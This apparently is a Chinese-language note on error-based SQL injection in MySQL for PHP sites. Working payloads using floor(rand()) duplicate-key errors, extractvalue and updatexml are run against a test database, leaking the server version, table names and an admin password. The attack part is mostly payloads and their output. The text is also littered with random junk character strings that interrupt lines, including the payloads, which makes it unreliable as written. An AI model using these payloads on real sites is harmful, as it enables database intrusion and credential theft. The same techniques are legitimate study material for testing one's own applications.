放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
5 Z; D5 j- B7 \3 a$ Q& b% ]4 U$ B实际测试环境:
5 c5 s4 `$ H- t) V
9 v: N. U) z/ d+ s8 h9 B9 I 7 y$ g4 w+ V' I* \8 X8 u* W; d( H+ ~ i& s
mysql> show tables;4 ]: @9 X% g5 P+ A: \
+----------------+4 _+ v; k3 Q/ L+ O/ r" h
| Tables_in_test |7 H2 T/ ^" A' R( s H; U
+----------------+
% Q* r. ^+ I1 {0 Y& ^, _% [# r| admin |
2 G+ }+ X$ l0 S6 F| article |* J% e' H8 l% D. m
+----------------+) z/ T. [2 G9 L4 k& p0 x! T0 f
5 U: ^6 e7 {2 K
4 L1 F: z( k8 `- l$ p" W
e; w- V7 m; X5 `) `' z5 Jmysql> describe admin;' g3 c: J8 H* [% N
+-------+------------------+------+-----+---------+----------------+
0 ^6 }9 P, \+ G7 J6 o; u0 N( v9 l| Field | Type | Null | Key | Default | Extra |
* G. F- M5 x6 I$ K Y5 Z; T+-------+------------------+------+-----+---------+----------------+9 A7 y; w$ r: s9 ?
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- E" x. m; i; U9 Q2 F9 {- G| user | varchar(50) | NO | | NULL | |
$ P8 p" s1 u" r/ \; g| pass | varchar(50) | NO | | NULL | |, h$ K' x* }( i; G5 Y7 L
+-------+------------------+------+-----+---------+----------------+
; e. {8 X/ k& Q/ W$ @ `4 h
: x$ `) Y1 e4 g2 |# Q0 P, T9 Z # U# L3 _# S6 z6 x) N
+ |% c( E6 f \: F/ {6 M! J9 w4 H
mysql> describe article;
- V1 T5 f1 f& \$ Z/ W$ P% K2 W, X+---------+------------------+------+-----+---------+----------------+5 _7 y, k$ I$ d$ U
| Field | Type | Null | Key | Default | Extra |
6 C s* M" ~1 s; z( Q+---------+------------------+------+-----+---------+----------------+
3 m: [! @1 y: V6 E& V& L* Q| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. Y2 _$ O) d3 k$ \
| title | varchar(50) | NO | | NULL | |( S& ]/ N! x$ _
| content | varchar(50) | NO | | NULL | |5 O3 m# _. t4 x. A
+---------+------------------+------+-----+---------+----------------+
5 ]! y$ F! B' P( \7 Y3 j% G7 h1、通过floor报错4 u+ D3 N# M2 D7 {
可以通过如下一些利用代码2 v$ |4 r: P2 z# C8 s
1 F# r j7 `% L/ |8 G* Q8 A
1 Q. t5 a# V! J5 @. Rand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x. U5 D) V. N; g; k: v) h
from information_schema.tables group by x)a);
2 _6 f- I' U1 g) V8 d: A 7 L6 U5 c$ ]" K7 J; v' ?3 k
3 F5 \9 }2 _: y( ~0 d$ Y, d) [' s
and (select count(*) from (select 1 union select null union select !1)x" g1 {- l F0 S4 X
group by concat((select table_name from information_schema.tables limit 1),5 Q5 u2 j/ g& U9 n
floor(rand(0)*2)));
! D5 V% V X) k5 \4 h$ M6 a- U2 B举例如下:
# S0 U& a; n/ r% b% d% {3 I首先进行正常查询:
: G, Q6 ]% Z/ W$ ^4 p1 Y 5 }$ D. [ w+ @6 n
mysql> select * from article where id = 1;6 M( I |1 w1 x D7 {, Q5 h; q
+----+-------+---------+
, N0 {8 ~- R1 q# A| id | title | content |. A; c5 Q1 m# C6 J! L' G
+----+-------+---------+" \( V0 j b5 H3 z: J. w% X
| 1 | test | do it |4 e1 @$ K# m" ?9 i S. P
+----+-------+---------+
1 O1 Q' _' N3 x+ g9 l假如id输入存在注入的话,可以通过如下语句进行报错。7 G& Z. z+ U% S
/ K, `) X3 A( H/ _' C9 Z 2 `/ p' m$ Z7 a# {; U
mysql> select * from article where id = 1 and (select 1 from L4 d8 ]6 h9 o4 p
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* m5 o x* a* ?7 @& lERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
3 }0 u& Z: g& v: H, n4 G可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
4 ^$ T2 Q0 P6 M3 ?6 W例如我们需要查询管理员用户名和密码:
/ s( |7 H8 ^: uMethod1:$ w) ?2 ~% g8 H+ p
6 _' @; h, _4 C% Z
% p2 E: n/ U. e; `
mysql> select * from article where id = 1 and (select 1 from2 s7 i1 ]* R5 V+ e7 E
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x+ `0 y* r' F7 p% F1 r- x5 V* P
from information_schema.tables group by x)a);6 G- S! L4 n* M' {- x
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'/ ?# m, A' f$ r0 m
Method2: T! c3 d' U* L* d0 ]; L _
' S) x1 Z' [* @- M! V* B6 c
7 [8 ~: \* A* D& V
mysql> select * from article where id = 1 and (select count(*)
( I6 Q& L' W( F7 pfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),0 F: C1 U4 |1 v
floor(rand(0)*2)));
6 k e0 q- {3 ?" nERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key') [- M. U5 b' g
2、ExtractValue$ E; l: D# s! @" @0 l
测试语句如下+ t4 j" e8 ]. {" P" M
5 }+ v0 c i5 ?" q( S6 n+ p% }, ~
! g6 A: Q/ k' x$ D4 t8 o5 v2 l
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));6 ~6 k8 t; u* H- H, h2 p9 c& }
实际测试过程
8 \# o4 E7 H+ N. P 0 R& U' c/ B6 p
% w6 X" O6 l. J& j) [; u) X0 y
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
, g( u/ E. H2 H0 H3 T* A* K& E(select pass from admin limit 1)));--: O2 m6 l. E+ R, c+ K4 G+ F0 x' t7 R
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
~! H v" [1 D3、UpdateXml
* f' F- _6 ^' {# [5 W+ t" w% U0 e测试语句
c& G& |/ O i: y X4 t ; ^ `' A4 a. [! o i4 _5 U' e! ~9 N
$ t% X" ^5 k) f2 s2 ?# uand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
% E+ r6 s4 l8 G6 L" o6 C# g- q实际测试过程4 g8 V: ^) X. b0 p O
4 }: T( T7 P `; I0 F
+ t. \, v1 Y4 |% i8 }. k) emysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,$ S. K f% _5 c* ` G4 d
(select pass from admin limit 1),0x5e24),1));5 ^! W" l* h6 x8 c$ [
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
! j5 s' w! m5 t$ H' P0 V, XAll, thanks foreign guys.- r. j6 V! d& |' Z$ N
/ g& u' W" _8 V/ _8 ~5 D) C* @
( h' E1 S$ H) ^ ^ |